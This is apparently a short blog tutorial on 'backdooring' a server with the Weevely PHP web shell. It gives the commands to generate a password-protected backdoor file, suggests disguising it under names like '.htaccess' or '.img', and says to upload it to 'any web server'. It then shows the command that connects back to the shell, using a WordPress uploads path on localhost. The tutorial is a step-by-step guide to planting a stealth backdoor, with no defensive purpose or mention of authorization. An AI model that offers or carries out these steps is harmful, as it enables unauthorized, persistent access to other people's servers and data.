Backdooring Server via Weevely

Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. You can Download weevely from  : Weevely Download
First run Weevely.


Run the following command  :
python weevely.py generate [PASSWORD]  [location]/filename.php 
For example :
python weevely.py generate nepal123  /home/lamgade/Desktop/uban.php
 ”nepal123″ is my password. “uban.php” is my filename.   You can keep any filename.php. You can keep other extension like “.htaccess” , “.img”
Now “uban.php” is a backdoor.
Once you have generated the backdoor, upload your backdoor in any web server and just use the following command to back connect.
For example i have uploaded backdoor in my localhost. And here is the backdoor location.
http://localhost/wordpress/wp-content/uploads/2014/04/uban.php 
And now my weevely command to back connect will be :
python weevely.py [URL OF THE BACKDOOR] [PASSWORD OF THE BACKDOOR]
python weevely.py http://localhost/wordpress/wpcontent/uploads/2014/04/uban.php nepal123
And when i connect it will give me the backdoor access.

 

Comments

There are no comments.

Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>